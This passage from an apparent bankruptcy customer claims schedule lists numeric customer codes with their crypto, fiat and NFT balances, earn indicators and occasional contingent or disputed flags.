| 07350373 | | BAT[10], BRZ[5], CUSDT[6], DOGE[.37848243], ETH[.00001191], ETHW[.00001191], GRT[11], LINK[.81090403], SOL[1], SUSHI[1], TRX[10], UNI[4], USD[0.00], USDT[13] | | |
| 07350374 | | CUSDT[2], DOGE[107.68312377], TRX[5], USD[0.00] | | |
| 07350375 | | USD[10.00] | | |
| 07350376 | | BF_POINT[400], CUSDT[6], DOGE[2217.9692731], TRX[1], USD[0.00], USDT[2.2207609] | Yes | |
| 07350377 | | BRZ[1], CUSDT[2], SHIB[1], USD[925.55] | Yes | |
| 07350378 | | BRZ[1], SHIB[17811704.83460559], USD[0.00] | | |
| 07350379 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350381 | | USD[0.20] | | |
| 07350382 | | SHIB[1], USD[0.01] | | |
| 07350383 | | USD[10.00] | | |
| 07350384 | | BRZ[17.25240872], BTC[0], CAD[0.00], CUSDT[1], DOGE[22.59231157], GRT[0.00006443], HKD[17.26], SGD[0.00], SOL[0.03754729], TRX[128.90093205], USD[98.71] | Yes | |
| 07350385 | | CUSDT[1], DOGE[366.38814011], USD[0.00] | Yes | |
| 07350386 | | TRX[2], USD[0.00] | | |
| 07350387 | | USD[10.00] | | |
| 07350388 | | CUSDT[1], DOGE[4.04359647], TRX[3], USD[0.00] | Yes | |
| 07350389 | | USD[10.00] | | |
| 07350390 | | USD[10.00] | | |
| 07350391 | | BRZ[1], DOGE[1], GRT[1], TRX[1], USD[0.01] | | |
| 07350392 | | CUSDT[2], USD[0.00] | Yes | |
| 07350393 | | USD[10.00] | | |
| 07350395 | | DOGE[1], USD[0.00] | | |
| 07350396 | | USD[0.00] | | |
| 07350397 | | DOGE[.88810515], USD[0.00] | | |
| 07350398 | | USD[10.00] | | |
| 07350399 | | USD[0.01] | | |
| 07350400 | | USD[10.00] | | |
| 07350401 | | USD[10.00] | | |
| 07350402 | | CUSDT[7], USD[0.01], USDT[0] | | |
| 07350403 | | NFT (548919582659920816/Coachella x FTX Weekend 2 #20116)[1], SOL[1.31926662], USD[0.00] | Yes | |
| 07350404 | | USD[10.00] | | |
| 07350405 | | CUSDT[1], DOGE[1.51032768], USD[0.01] | | |
| 07350406 | | USD[10.00] | | |
| 07350407 | | USD[10.00] | | |
| 07350408 | | DOGE[133.10983304], USD[0.00] | | |
| 07350409 | | USD[10.00] | | |
| 07350410 | | USD[10.00] | | |
| 07350411 | | USD[10.00] | | |
| 07350412 | | DOGE[.00005962], TRX[1], USD[0.18] | | |
| 07350413 | | DOGE[282.49770868], TRX[1], USD[0.00] | | |
| 07350414 | | USD[0.00] | | |
| 07350415 | | DOGE[1925.68631439], USD[0.00] | | |
| 07350416 | | USD[10.00] | | |
| 07350417 | | USD[0.00] | | |
| 07350418 | | USD[10.00] | | |
| 07350419 | | CUSDT[1], DOGE[.00000235], TRX[1], USD[0.01] | | |
| 07350421 | | BAT[.00122048], BRZ[1.0000683], BTC[.00000003], CUSDT[10], DOGE[2.00099657], GRT[.0049744], LINK[.00007753], PAXG[.00000001], SOL[.00009309], SUSHI[.00003879], TRX[.00190182], USD[0.85], USDT[0] | | |
| 07350422 | | USD[10.00] | | |
| 07350423 | | USD[10.00] | | |
| 07350424 | | DOGE[1073.70960518], USD[0.00] | | |
| 07350425 | | BTC[0], DOGE[0], ETH[0], USD[0.01], USDT[0] | | |
| 07350426 | | USD[10.00] | | |
| 07350427 | | USD[10.00] | | |
| 07350428 | | USD[10.00] | | |
| 07350429 | | USD[0.00] | | |
| 07350430 | | ETH[.00002694], ETHW[3.11832863], NFT (409639924854088174/FTX - Off The Grid Miami #5648)[1], NFT (419553633985966811/Imola Ticket Stub #2133)[1], NFT (420793875111835027/AI-generated landscape #148)[1], SOL[.002], USD[3198.65], USDT[0] | Yes | |
| 07350431 | | DOGE[47.25048002], USD[0.00] | Yes | |
| 07350432 | | USD[10.00] | | |
| 07350433 | | BAT[1.01655549], BRZ[3], CUSDT[3], DOGE[1002.03485678], GRT[4003.10365713], TRX[3], USD[108.09], USDT[1.09012433] | Yes | |
| 07350434 | | BRZ[0], DOGE[.15528864], USD[0.00] | | |
| 07350435 | | BF_POINT[100], CUSDT[28], DOGE[1.01282582], LINK[26.51410809], MATIC[.0030472], SHIB[2], USD[188.14] | Yes | |
| 07350436 | | BAT[2], BRZ[7], CUSDT[68.24261297], GRT[1], USD[0.00], USDT[3] | | |
| 07350437 | | CUSDT[10], USD[0.00] | | |
| 07350438 | | BTC[0.01571680], CUSDT[3], ETH[.04045386], ETHW[.03994824], SOL[.82659343], TRX[1], USD[0.00] | Yes | |
| 07350439 | | USD[10.00] | | |
| 07350440 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350442 | | USD[0.01] | | |
| 07350443 | | CUSDT[1], DOGE[19.19773629], USD[0.00] | | |
| 07350444 | | BRZ[2], BTC[0], CUSDT[7], DOGE[2], TRX[3], USD[0.00], USDT[0] | | |
| 07350445 | | USD[10.00] | | |
| 07350446 | | USD[10.00] | | |
| 07350448 | | USD[10.00] | | |
| 07350449 | | USD[0.00] | | |
| 07350451 | | USD[10.00] | | |
| 07350452 | | USD[10.00] | | |
| 07350453 | | USD[10.00] | | |
| 07350454 | | CUSDT[1], DOGE[347.03236221], USD[0.00] | | |
| 07350455 | | USD[10.00] | | |
| 07350456 | | USD[10.00] | | |
| 07350457 | | USD[10.00] | | |
| 07350459 | | USD[10.00] | | |
| 07350461 | | CUSDT[.00002454], DOGE[.00003709], TRX[1], USD[0.01] | | |
| 07350462 | | SHIB[1], TRX[1], USD[0.00] | | |
| 07350463 | | USD[10.00] | | |
| 07350464 | | USD[10.00] | | |
| 07350465 | | BRZ[0], CUSDT[2], DOGE[0], ETH[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07350466 | | NFT (501139290122187469/Coachella x FTX Weekend 1 #23216)[1], USD[10.00] | | |
| 07350467 | | USD[10.00] | | |
| 07350468 | | DOGE[1.85931327], TRX[2], USD[0.00] | | |
| 07350469 | | CUSDT[2], DOGE[7.34302865], ETH[.00961588], ETHW[.00949276], TRX[3], USD[0.02] | Yes | |
| 07350470 | | TRX[181.65304268], USD[0.00] | | |
| 07350471 | | DOGE[45.95499735], USD[0.00] | | |
| 07350472 | | DOGE[2359.54289991], TRX[1], USD[10.00] | | |
| 07350474 | | USD[10.00] | | |
| 07350475 | | USD[10.00] | | |
| 07350476 | | USD[0.00] | | |
| 07350477 | | DOGE[2772.76493047], ETH[0], SHIB[14948.80851268], TRX[0], USD[0.00] | Yes | |
| 07350478 | | USD[10.00] | | |
| 07350480 | | CUSDT[1], DOGE[67.76529794], USD[0.01] | | |
| 07350481 | | DOGE[1015.46757571], USD[10.00] | | |
| 07350482 | | USD[0.00] | | |
| 07350483 | | USD[10.00] | | |
| 07350484 | | CUSDT[2], DOGE[2139.14247855], TRX[1], USD[0.88] | | |
| 07350485 | | BAT[220.62732467], CUSDT[35], DOGE[7433.50274155], KSHIB[1121.11400628], SHIB[1188740.50848428], SUSHI[12.55938346], TRX[9135.73286953], UNI[6.86473752], USD[0.00] | Yes | |
| 07350486 | | USD[10.00] | | |
| 07350487 | | USD[10.00] | | |
| 07350488 | | BAT[1], BRZ[2], DOGE[1], TRX[4], USD[0.00] | | |
| 07350489 | | BAT[1.01655549], CUSDT[4], DOGE[2], LTC[.00285791], SHIB[9], TRX[3], USD[0.01] | Yes | |
| 07350490 | | USD[10.00] | | |
| 07350491 | | USD[10.00] | | |
| 07350492 | | USD[10.00] | | |
| 07350493 | | USD[10.00] | | |
| 07350495 | | USD[0.00] | | |
| 07350496 | | USD[10.00] | | |
| 07350497 | | USD[10.00] | | |
| 07350498 | | USD[10.00] | | |
| 07350499 | | BRZ[1], CUSDT[6], TRX[3], USD[0.01], USDT[1.09851913] | Yes | |
| 07350500 | | CUSDT[1], DOGE[31.0758533], TRX[114.32484604], USD[0.13] | | |
| 07350501 | | USD[10.00] | | |
| 07350502 | | CUSDT[3], DOGE[2492.38648154], USD[130.79] | | |
| 07350503 | | DOGE[5584.34561434], USD[35.00] | | |
| 07350504 | | USD[10.00] | | |
| 07350505 | | CUSDT[2], DOGE[.00001747], TRX[3], USD[0.01] | | |
| 07350506 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350507 | | DOGE[2527.72772588], USD[10.00] | | |
| 07350508 | | USD[10.00] | | |
| 07350509 | | DOGE[671.79550676], ETHW[.00160846], GRT[2], TRX[2], USD[0.00] | | |
| 07350510 | | USD[0.00] | | |
| 07350511 | | USD[10.00] | | |
| 07350512 | | DOGE[30.00590479], UNI[.00002662], USD[0.00] | | |
| 07350513 | | DOGE[24.3807794], USD[0.00] | | |
| 07350514 | | CUSDT[1], USD[45.17] | | |
| 07350515 | | USD[10.00] | | |
| 07350516 | | USD[10.00] | | |
| 07350517 | | BAT[.0000594], BCH[0], BTC[0], CUSDT[2], DOGE[0.00194207], SUSHI[0], USD[0.01] | | |
| 07350519 | | DOGE[1], ETH[1.11405327], ETHW[1.11358545], TRX[1], USD[0.09] | Yes | |
| 07350520 | | USD[10.00] | | |
| 07350521 | | USD[0.00] | | |
| 07350522 | | USD[10.00] | | |
| 07350523 | | NFT (356406153626067408/Entrance Voucher #2184)[1], USD[0.00] | | |
| 07350524 | | DOGE[25858.09946433], USD[10.93] | Yes | |
| 07350525 | | SHIB[150037.50937734], USD[0.00] | | |
| 07350526 | | BTC[0], CUSDT[6], DOGE[3156.10683625], TRX[4], USD[0.00] | | |
| 07350527 | | BTC[.00282015], USD[0.05] | | |
| 07350528 | | CUSDT[6], SUSHI[.00000034], TRX[1], USD[13.05] | | |
| 07350529 | | USD[10.00] | | |
| 07350530 | | DOGE[141.75188317], USD[0.00] | | |
| 07350531 | | USD[10.00] | | |
| 07350532 | | ALGO[0], BCH[.00000019], BTC[0], USD[0.00] | Yes | |
| 07350533 | | BF_POINT[300], BRZ[2], CUSDT[3], DOGE[1082.58976696], ETH[0], ETHW[0], GRT[1], MATIC[38.98427312], NFT (444535266134765450/Imola Ticket Stub #1778)[1], NFT (453860261305759383/Barcelona Ticket Stub #2430)[1], SHIB[1604955.36068707], SOL[.00001219], TRX[3], USD[0.00], USDT[1.025431971 | Yes | |
| 07350534 | | USD[0.01], USDT[0] | | |
| 07350535 | | USD[10.00] | | |
| 07350536 | | USD[10.00] | | |
| 07350537 | | DOGE[5251.51245001], USD[10.00] | | |
| 07350538 | | USD[10.00] | | |
| 07350539 | | CUSDT[1], ETH[.00000001], USD[0.00], USDT[0] | | |
| 07350540 | | USD[10.00] | | |
| 07350541 | | USD[10.00] | | |
| 07350542 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07350543 | | ETH[.00525379], ETHW[.00518539], USD[0.00] | Yes | |
| 07350544 | | USD[0.00] | | |
| 07350545 | | USD[0.00] | | |
| 07350546 | | BRZ[2], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07350547 | | ETH[.0062108], ETHW[.0062108], USD[0.00] | | |
| 07350548 | | DOGE[31.87290818], USD[0.00] | | |
| 07350549 | | USD[10.00] | | |
| 07350550 | | DAI[0], DOGE[1.00004730], ETH[.00369577], ETHW[.00365473], USD[0.00] | Yes | |
| 07350551 | | BRZ[1], CUSDT[6], DOGE[211.07848005], ETH[0.03435829], ETHW[0.03393421], TRX[365.96723748], USD[0.00] | Yes | |
| 07350552 | | BAT[600.85551059], BCH[.08295085], BTC[.0044093], CUSDT[5], DOGE[530.51970763], ETH[.24487928], ETHW[.24487928], LINK[8.90410376], SUSHI[5.12824254], TRX[2504.60644827], USD[0.00] | | |
| 07350554 | | SHIB[886756.20436348], USD[0.00] | | |
| 07350555 | | USD[10.00] | | |
| 07350556 | | DOGE[.06644895], USD[0.00], USDT[0] | | |
| 07350557 | | DOGE[1.00000112], USD[0.56] | | |
| 07350558 | | USD[10.00] | | |
| 07350559 | | NFT (476531020838533592/Coachella x FTX Weekend 1 #4088)[1], USD[10.00] | | |
| 07350560 | | CUSDT[1], DOGE[.00000265], USD[0.00], USDT[1] | | |
| 07350561 | | USD[10.00] | | |
| 07350562 | | USD[10.76] | Yes | |
| 07350563 | | BRZ[1], CUSDT[18.25427717], DOGE[3991.81348427], ETH[.00069863], ETHW[.00069863], SHIB[155060.61460389], SUSHI[.05861995], TRX[3], USD[4.14], USDT[1] | | |
| 07350564 | | USD[10.00] | | |
| 07350565 | | BTC[0] | Yes | |
| 07350566 | Contingent, Disputed | BRZ[1], CUSDT[5], DOGE[0], ETH[0], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350567 | | BTC[.00105307], CUSDT[9], TRX[2], USD[0.01] | | |
| 07350568 | | USD[10.57] | Yes | |
| 07350569 | | USD[10.00] | | |
| 07350570 | | USD[10.00] | | |
| 07350571 | | DOGE[132.67774605], USD[10.00] | | |
| 07350572 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07350573 | | USD[0.00] | | |
| 07350574 | | USD[10.00] | | |
| 07350575 | | USD[10.00] | | |
| 07350576 | | BRZ[1], CUSDT[6], DOGE[233.05869584], TRX[302.11377913], USD[74.51] | | |
| 07350577 | | USD[10.00] | | |
| 07350578 | | USD[10.00] | | |
| 07350579 | | USD[10.00] | | |
| 07350580 | | BAT[2], BRZ[4], CUSDT[7], DOGE[1352.81780232], GRT[1], TRX[4], USD[0.00], USDT[1] | | |
| 07350581 | | DOGE[0], SUSHI[.00000102], USD[10.00] | | |
| 07350582 | | USD[0.00] | | |
| 07350583 | | BAT[2], BRZ[2], CUSDT[2], ETH[.00000683], ETHW[.00000683], GRT[1], TRX[6], USD[0.00] | | |
| 07350584 | | USD[10.00] | | |
| 07350585 | | NFT (308862363620850580/WeAreOne-Cube#5)[1], NFT (346310479057842928/Crazy dog#7)[1], NFT (401397889888325745/Ready?)[1], NFT (449746677502617113/Parallel Scene #8)[1], NFT (522238583367093307/No sense album #4)[1], USD[0.45] | Yes | |
| 07350587 | | DOGE[2979.62183618], USD[0.00] | Yes | |
| 07350588 | | BAT[1], BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07350589 | | ETH[.00488054], ETHW[.00488054], USD[0.00] | | |
| 07350591 | | USD[10.00] | | |
| 07350592 | | BTC[.00017239], USD[0.00] | | |
| 07350593 | | DOGE[0], USD[0.00] | | |
| 07350594 | | USD[10.00] | | |
| 07350595 | | USD[10.00] | | |
| 07350596 | | CUSDT[1], SHIB[1], USD[0.00] | Yes | |
| 07350597 | | USD[10.00] | | |
| 07350598 | | BRZ[1], CUSDT[3], DOGE[2], ETH[.23274063], ETHW[.23253687], TRX[1], USD[0.00] | Yes | |
| 07350600 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07350601 | | USD[0.00] | | |
| 07350602 | | USD[10.00] | | |
| 07350603 | | USD[10.00] | | |
| 07350604 | | USD[10.00] | | |
| 07350605 | | USD[0.01] | | |
| 07350607 | | USD[10.00] | | |
| 07350608 | | BRZ[3], CUSDT[3], DOGE[7771.29729301], GRT[2], SHIB[20807324.17811069], SOL[1], TRX[3], USD[0.04] | | |
| 07350609 | | USD[10.00] | | |
| 07350610 | | DOGE[154.37482825], USD[0.00] | | |
| 07350611 | | USD[10.00] | | |
| 07350612 | | CUSDT[4], DOGE[2067.51251410], TRX[1], USD[0.00] | Yes | |
| 07350615 | | BAT[2], BRZ[2], CUSDT[3], TRX[4], USD[0.00] | | |
| 07350616 | | USD[10.00] | | |
| 07350617 | | USD[0.00] | Yes | |
| 07350618 | | BAT[1], BRZ[3], CUSDT[13], SHIB[3], USD[0.01] | | |
| 07350619 | | USD[10.00] | | |
| 07350620 | | CUSDT[1], DOGE[1.24028774], TRX[2], USD[0.01] | | |
| 07350621 | | CUSDT[1], DOGE[1], SHIB[129.73307086], USD[0.00] | Yes | |
| 07350622 | | USD[10.00] | | |
| 07350623 | | USD[10.00] | | |
| 07350624 | | SHIB[1], USD[0.00] | Yes | |
| 07350625 | | USD[10.00] | | |
| 07350626 | | USD[10.00] | | |
| 07350627 | | DOGE[25.39328355], USD[0.00] | | |
| 07350628 | | CUSDT[4], DOGE[19], ETH[0], USD[0.01] | | |
| 07350629 | | DOGE[31.86025023], USD[0.00] | | |
| 07350631 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350632 | | USD[10.00] | | |
| 07350633 | | USD[10.00] | | |
| 07350634 | | USD[0.00] | | |
| 07350635 | | CUSDT[1], DOGE[1344.87710673], SHIB[7145288.1089419], TRX[1], USD[0.00] | | |
| 07350637 | | USD[10.00] | | |
| 07350638 | | DOGE[133.70092173], USD[0.00] | | |
| 07350639 | | USD[10.00] | | |
| 07350640 | | CUSDT[1], LINK[0], USD[0.00] | | |
| 07350641 | | USD[10.92] | Yes | |
| 07350642 | | USD[9.86] | Yes | |
| 07350643 | | DOGE[4227.09746859], TRX[2], USD[0.00] | | |
| 07350644 | | USD[10.00] | | |
| 07350645 | | BTC[0], DOGE[0], USD[0.01] | | |
| 07350646 | | BAT[1], BRZ[1], DOGE[836.9069845], TRX[1], USD[0.00] | | |
| 07350647 | | USD[10.00] | | |
| 07350648 | | DOGE[2], TRX[2], USD[137.57] | | |
| 07350649 | | USD[10.00] | | |
| 07350650 | | BRZ[3], CUSDT[11], TRX[4], USD[0.00] | | |
| 07350651 | | USD[10.00] | | |
| 07350652 | | USD[10.00] | | |
| 07350653 | | CUSDT[3], DOGE[.00001224], USD[0.04], USDT[1] | | |
| 07350654 | | USD[10.00] | | |
| 07350655 | | BTC[.00104886], DOGE[6056.43400016], TRX[0], USD[0.00] | | |
| 07350656 | | USD[10.00] | | |
| 07350657 | | BRZ[1], CUSDT[5], SHIB[1], SUSHI[1.08606025], TRX[4], USD[0.00] | Yes | |
| 07350658 | | USD[10.00] | | |
| 07350659 | | BRZ[1], CUSDT[9], TRX[3], USD[0.55] | | |
| 07350660 | | USD[10.00] | | |
| 07350662 | | DOGE[1], ETH[0], USD[0.01] | | |
| 07350663 | | CUSDT[.00016459], USD[0.00] | | |
| 07350664 | | CUSDT[3], DOGE[.18137284], SOL[.07569838], TRX[2], USD[0.89] | | |
| 07350665 | | USD[10.00] | | |
| 07350666 | | USD[10.00] | | |
| 07350667 | | BRZ[0], DOGE[0.00001317], GRT[0], SOL[.00014274], TRX[1], USD[0.00] | | |
| 07350668 | | BRZ[1], CUSDT[6], GRT[23.53776779], SHIB[3], SOL[1.05176419], USD[0.00] | Yes | |
| 07350669 | | CUSDT[6], DOGE[4027.8243951], TRX[2], USD[0.00] | Yes | |
| 07350670 | | BRZ[1], CUSDT[2], DOGE[24473.64312234], TRX[2], USD[0.00] | | |
| 07350671 | | USD[10.00] | | |
| 07350672 | | BRZ[2], CUSDT[2], DOGE[40.32095297], GRT[.00926381], TRX[2], USD[0.29] | | |
| 07350673 | | CUSDT[6], DOGE[2.15160368], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07350674 | | AUD[1.31], BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.12], CUSDT[0.25000000], DOGE[4.66397549], ETH[0], EUR[0.00], GBP[0.00], LINK[0.00448180], LTC[0], PAXG[0.00019813], SGD[0.20], SUSHI[.00843037], TRX[0], USD[0.00], USDT[0.00010964], YFI[0.00001016] | | |
| 07350675 | | BAT[4.37111463], BRZ[1], CUSDT[5], DOGE[1], GRT[4.25021618], MATIC[54.44719964], NFT [34080134613011858/Founding Frens Lawyer #664][1], NFT [47968118236258184/Founding Frens Investor #4521][1], SHIB[1], SOL[.44000353], TRX[221.82780993], USD[0.01] | Yes | |
| 07350676 | | BRZ[1], ETH[0], ETHW[0], TRX[2], USD[87.43] | | |
| 07350677 | | BAT[30.73125355], BTC[.0028776], CUSDT[1], DOGE[3308.16813968], ETH[.02610982], ETHW[.02610982], SOL[19.41706851], SUSHI[1.47992183], TRX[1], USD[0.03] | | |
| 07350678 | | CUSDT[7], GRT[3], USD[0.00], USDT[0] | | |
| 07350679 | | USD[10.00] | | |
| 07350680 | | CUSDT[1], DOGE[3], USD[0.01] | | |
| 07350681 | | DOGE[0], USD[0.00] | Yes | |
| 07350682 | | BTC[0], DOGE[4.54177755], USD[0.00] | | |
| 07350683 | | USD[10.00] | | |
| 07350684 | | DOGE[5124.19614436], TRX[1], USD[0.02] | | |
| 07350685 | | USD[10.00] | | |
| 07350686 | | CUSDT[1], DOGE[1.00448466], TRX[1], USD[0.00] | | |
| 07350687 | | CUSDT[8], DOGE[1.46727298], USD[3.00] | | |
| 07350688 | | USD[10.00] | | |
| 07350689 | | USD[10.00] | | |
| 07350690 | | CUSDT[3], TRX[2], USD[0.01] | Yes | |
| 07350691 | | DOGE[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350692 | | BRZ[1], DOGE[1], TRX[2], USD[10.00] | | |
| 07350693 | | USD[10.00] | | |
| 07350694 | | CUSDT[1], USD[0.01] | | |
| 07350695 | | BRZ[2], CUSDT[3], DOGE[1], TRX[2], USD[0.00] | | |
| 07350696 | | USD[10.00] | | |
| 07350697 | | USD[10.00] | | |
| 07350699 | | CUSDT[4], TRX[2], USD[0.00] | | |
| 07350700 | | ETHW[0], SHIB[291.26816074], USD[0.00] | Yes | |
| 07350701 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07350702 | | USD[10.00] | | |
| 07350703 | | DOGE[171.02776892], USD[0.00] | Yes | |
| 07350704 | | AUD[2.56], BAT[14.71084315], BCH[.11876704], BRZ[50.26734183], BTC[.02993964], CAD[2.39], CUSDT[59.78933895], DAI[9.92881506], DOGE[3350.7002425], ETH[.04768647], ETHW[.04768647], EUR[0.80], GBP[1.40], GRT[14.45451953], LINK[.39970486], LTC[.52509465], MKR[.0030581], PAXG[.00527015], SOL[.24834149], SUSHI[1.06136306], TRX[7.77288124], UNI[.41507947], USD[0.01], USDT[9.94705571, YFI[.00024759] | | |
| 07350705 | | DOGE[138.59833288], USD[0.00] | | |
| 07350706 | | USD[10.00] | | |
| 07350707 | | BTC[.00347713], DOGE[20730.93005617], NFT (529454184215760212/Miami Ticket Stub #544)[1], SHIB[8811794.25071368], USD[0.00] | Yes | |
| 07350708 | | CUSDT[2], USD[0.01] | | |
| 07350709 | | BRZ[0], USD[0.01], USDT[0] | Yes | |
| 07350710 | | USD[10.00] | | |
| 07350711 | | DOGE[.77062499], USD[0.00] | | |
| 07350712 | | BCH[.30840875], BRZ[2], CUSDT[3], DOGE[11214.29604863], SOL[20.3735713], TRX[1], USD[10.77] | | |
| 07350713 | | USD[10.00] | | |
| 07350714 | | USD[0.05], USDT[0] | | |
| 07350715 | | USD[10.00] | | |
| 07350716 | | BTC[.00011229], ETH[.00288551], ETHW[.00288551], GRT[11.78925691], USD[0.00] | | |
| 07350717 | | USD[10.00] | | |
| 07350718 | | CUSDT[469.72502574], DOGE[.60560896], TRX[1], USD[0.00] | | |
| 07350719 | | USD[10.00] | | |
| 07350720 | | CUSDT[2], DOGE[1.82907342], USD[0.01] | Yes | |
| 07350721 | | USD[10.00] | | |
| 07350722 | | USD[10.00] | | |
| 07350723 | | USD[10.00] | | |
| 07350724 | | USD[10.00] | | |
| 07350725 | | USD[10.00] | | |
| 07350726 | | BTC[0], CUSDT[3], DOGE[1], LTC[0], TRX[1], USD[0.00] | | |
| 07350727 | | CUSDT[1], DOGE[2338.89947206], USD[10.87] | Yes | |
| 07350728 | | BTC[0], DOGE[0.10173716], USD[0.09] | | |
| 07350729 | | USD[10.00] | | |
| 07350730 | | USD[10.00] | | |
| 07350731 | | DOGE[184.81891636], USD[0.03], USDT[0] | Yes | |
| 07350732 | | USD[0.66], USDT[0] | | |
| 07350733 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07350734 | | USD[10.00] | | |
| 07350735 | | BAT[1], BRZ[3], CUSDT[17], DOGE[0], TRX[10], USD[0.00] | | |
| 07350736 | | BAT[1], USD[0.00] | | |
| 07350737 | | USD[10.00] | | |
| 07350738 | | BRZ[1], CUSDT[1], DOGE[1.70123012], TRX[1], USD[0.53] | | |
| 07350739 | | USD[10.00] | | |
| 07350740 | | USD[10.00] | | |
| 07350741 | | DOGE[1], USD[0.02] | | |
| 07350742 | | USD[10.00] | | |
| 07350743 | | CUSDT[3], DOGE[1], TRX[1], USD[0.01] | | |
| 07350744 | | USD[10.00] | | |
| 07350745 | | USD[10.00] | | |
| 07350747 | | CUSDT[1], USD[0.00] | Yes | |
| 07350748 | | USD[0.00] | | |
| 07350749 | | DOGE[152.01118066], USD[0.00] | | |
| 07350750 | | BRZ[2], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350751 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01] | | |
| 07350752 | | USD[10.00] | | |
| 07350753 | | USD[10.00] | | |
| 07350754 | | USD[0.03] | Yes | |
| 07350756 | | BTC[0], ETH[.00000001], ETHW[0], SUSHI[0], USD[0.00], USDT[0.00000001] | | |
| 07350757 | | SHIB[9911911.04279899], TRX[1], USD[0.00] | | |
| 07350758 | | DOGE[11018.70642339], ETH[0], ETHW[0], TRX[1], USD[0.00] | Yes | |
| 07350759 | | CUSDT[0], DOGE[63.01244193], TRX[56.73550627], USD[0.00] | | |
| 07350760 | | BAT[1], TRX[5], USD[0.01], USDT[1] | | |
| 07350761 | | USD[10.00] | | |
| 07350762 | | USD[10.00] | | |
| 07350763 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07350764 | | USD[10.00] | | |
| 07350766 | | CAD[0.09], CUSDT[3.17027352], DOGE[.72558277], USD[10.12] | | |
| 07350767 | | DOGE[130.72020164], USD[0.00] | | |
| 07350768 | | BRZ[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07350771 | | BAT[3.28675815], BRZ[5.07952967], CUSDT[31.07692703], DOGE[57021.868943], GRT[5.31443093], LINK[1.10618255], SOL[1.10618255], SUSHI[1.10588965], TRX[1], USD[0.00], USDT[4.42473003] | Yes | |
| 07350772 | | USD[10.00] | | |
| 07350773 | | BTC[.00016643], DOGE[2997.77097926], USD[0.00] | | |
| 07350774 | | USD[10.00] | | |
| 07350776 | | DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07350777 | | USD[10.00] | | |
| 07350778 | | BTC[.000151172], CUSDT[1], DOGE[2.1205216], ETH[.03657669], ETHW[.03657669], USD[88.57] | | |
| 07350779 | | USD[0.00] | | |
| 07350780 | | USD[10.00] | | |
| 07350781 | | USD[0.00] | | |
| 07350782 | | CUSDT[3], DOGE[0], TRX[1], USD[3503.82] | | |
| 07350783 | | BRZ[0], BTC[0], DOGE[0.17190618], ETH[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07350784 | | USD[10.00] | | |
| 07350786 | | USD[10.00] | | |
| 07350787 | | DOGE[25.07832147], USD[0.00] | | |
| 07350788 | | USD[0.01] | | |
| 07350789 | | USD[0.00] | | |
| 07350790 | | BRZ[1], BTC[0], CUSDT[4], USD[0.01], USDT[0] | | |
| 07350791 | | DOGE[1], USD[0.01] | | |
| 07350792 | | BTC[0], CUSDT[1], DOGE[1], LTC[.0275613], USD[0.00] | | |
| 07350793 | | BAT[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0.19255011], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07350794 | | USD[10.00] | | |
| 07350795 | | BRZ[0], BTC[0], CUSDT[1], DOGE[2], ETH[0], GRT[2], TRX[1], USD[0.01], USDT[0] | | |
| 07350796 | | USD[0.00] | | |
| 07350797 | | USD[0.01] | Yes | |
| 07350798 | | USD[10.00] | | |
| 07350799 | | USD[10.00] | | |
| 07350800 | | DOGE[9600.64962016], USD[0.00] | | |
| 07350801 | | USD[10.00] | | |
| 07350802 | | USD[10.00] | | |
| 07350803 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07350804 | | DOGE[.00995575], LINK[.00006376], TRX[1], USD[0.01] | | |
| 07350805 | | DOGE[15.14033722], USD[0.00] | | |
| 07350806 | | CUSDT[1], DOGE[963.89846807], USD[10.50] | | |
| 07350807 | | USD[10.00] | | |
| 07350808 | | USD[0.00] | | |
| 07350809 | | USD[10.00] | | |
| 07350810 | | USD[10.00] | | |
| 07350811 | | DOGE[2677.56748622], TRX[1], USD[0.00] | | |
| 07350813 | | CUSDT[1], DOGE[440.12842587], USD[22.67] | | |
| 07350814 | | USD[10.00] | | |
| 07350815 | | CUSDT[1], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
